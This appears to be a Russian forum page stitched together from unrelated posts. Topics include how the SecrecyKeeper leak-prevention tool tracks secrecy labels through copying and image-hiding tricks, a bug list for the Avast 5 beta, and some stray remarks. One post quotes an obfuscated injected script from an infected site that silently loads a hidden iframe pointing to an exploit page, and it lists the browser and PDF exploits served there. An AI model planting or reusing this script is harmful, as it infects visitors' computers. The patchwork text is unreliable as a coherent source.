Лидеры форума

2. Процесс копирования происходит следующим образом: 2.1. Программа (word, explorer, copy и т.п.) открывает и читает файл Х.doc - SecrecyKeeper устанавливает для процесса copy.exe уровень равный степени секретности Х.doc; 2.2. copy.exe создает и пишет данные в Х2.doc - SecrecyKeeper устанавливает для Х2.doc секретность равную уровню процесса copy.exe; 3. Архивация полностью аналогична копированию. сами данные не анализируются, степень секретности технически к содержимому не привязана, она устанавливается для контейнера; 4. Происходит переименовывание архива в Х3.rar - если переименование внутри тома (дискового), то это тот же файл, просто с другим именем, если перенос - то это копирование + переименование внутри тома; 5. Происходит соединение этого архива с картинкой как показано по ссылке выше. все в точности как в п2 - copy открывает секретный файл, после этого любой созданный им файл станет секретным, что бы туда не писалось; 5.1. Данный архив открывается через hex-редактор и копируется (ctrl+c) как набор циферок и затем эти циферки пишутся в текстовый файл (ctrl+v) и уже этот файл соединяется как описано выше с картинкой) 5.1.1. hex-редактору ставится уровень секретности; 5.1.2. для буфера обмена ставится метка секретности, т.к. туда сделал запись меченый процесс; 5.1.3. для текстового редактора ставится уровень секретности, т.к. он прочитал данные из меченого буфера обмена; долее все как в п2 5.2. Доходим до массива циферок как в пункте 5.1, но не копируем массив, а делаем его скриншот средствами системы и затем получившееся изображение джойним к картинке. Если в пользовательской сессии есть хоть один процесс, получивший доступ к секретным данным (а раз вы открыли секретный файл, то так и есть), то скриншот будет иметь секретность равную секретности самого секретного процесса, при сохранении его в файл, этот файл также станет секретным. Если что-то описал не внятно, спрашивайте, постараюсь уточнить.

Ограничения и баги Это первая бета-версия имеет некоторые ограничения / ошибки / проблемы. Чтобы назвать наиболее важные из них: 1. В настоящее время она не содержит самые актуальные вирусные базы. То есть, часть баз несколько устарели, а мы ещё вносим изменения в программе. Таким образом, не рекомендуется использовать эту бета-версию в качестве инструмента для защиты вашей системы. Кроме того, ещё рано устраивать Avast! 5 тесты на детектирование зловредов. 2. Поведенческий экран/щит еще не в полной мере подключён (имеет очень ограниченную функциональность на данный момент - всего лишь каркас) 3. нет антируткита. 4. Пока программа без регистрации/активации ... Однако, программа будет отключена после 2-х месяцев использования (но будет несколько бет) 5. звуков в программе нет. Звуки будут в Final релизе Avast! (или в поздних бета-версиях). 6. дизайн, вероятно, ещё изменится ... углы округлятся и т.д. .. 7. некоторые параметры защиты интернета отсутствуют 8. некоторые из "резидентных провайдеров" требуют перезагрузки для эффективной работы(Actions, Alerts, Report file, Packers, ...) 9. GUI не получает автоматически обновляется (например, вы что-то изменили с помощью иконки в трее, но главное окно не обновляет себя, чтобы отразить это изменение) 10. в iNews, сообществах и журналах событий страниц просто метки ATM 11. Окно "the Scan Result" претерпит некоторые изменения. 12. Встроенный в программу механизм обновлений не просит перезагрузки (даже если это необходимо для того, чтобы применить новые обновления). Кроме того, обновление, которые были запущены с главного интерфейса, может в конечном итоге прийти в неожиданное состояние. В качестве альтернативы, мы рекомендуем использовать этот алгоритм в Панель управления -> Установка и удаление программ -> Avast! Free Antivirus -> Изменить / Удалить -> Обновить. 13. Антивируса в контекстном меню нет. Оговорки Это бета-версии программного обеспечения. Используйте на свой страх и риск. Мы планируем иметь около двух бета каждую неделю до тех пор, пока программа не претерпит сильных изменений. Затем около одной beta в неделю.

Плюс к вышесказанному:

Мухаха!! Реално инфекченный сайт: <script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script> Это iframe, ведущий на страницу с эксплоитом. А там полно вкусностей: MDAC directshow pdf - util_printf, Collab.collectEmailInfo и collab_geticon (будут заражены все у кого акробат менее чем версии 9.0 внезависимости от используемого браузера) swf aolwinamp snapshot spreadsheet -вроде в прошлый вторник майкрософт выпустил патч Собственно бинарник: http://www.virustotal.com/ru/analisis/2c9a...e352-1250730484 на текущий момент: http://www.virustotal.com/ru/analisis/2c9a...e352-1250777968 Pdf-ка с эксплоитом: http://www.virustotal.com/ru/analisis/f5a4...d093-1250778731 Флешка: http://www.virustotal.com/ru/analisis/73bc...bad9-1250780189

Более того - для "голой" 459 совершенно необязательна перезагрузка для применения патча "а" - проблема решается немедленно после обновления баз.

Ну, вот и появился Avast 5.0 Free AV - First Beta [version 5.0.70]

Вне зависимости от результатов обсуждения на экспертном совете хотел бы поблагодарить общественность за оказанное доверие, право даже не ожидал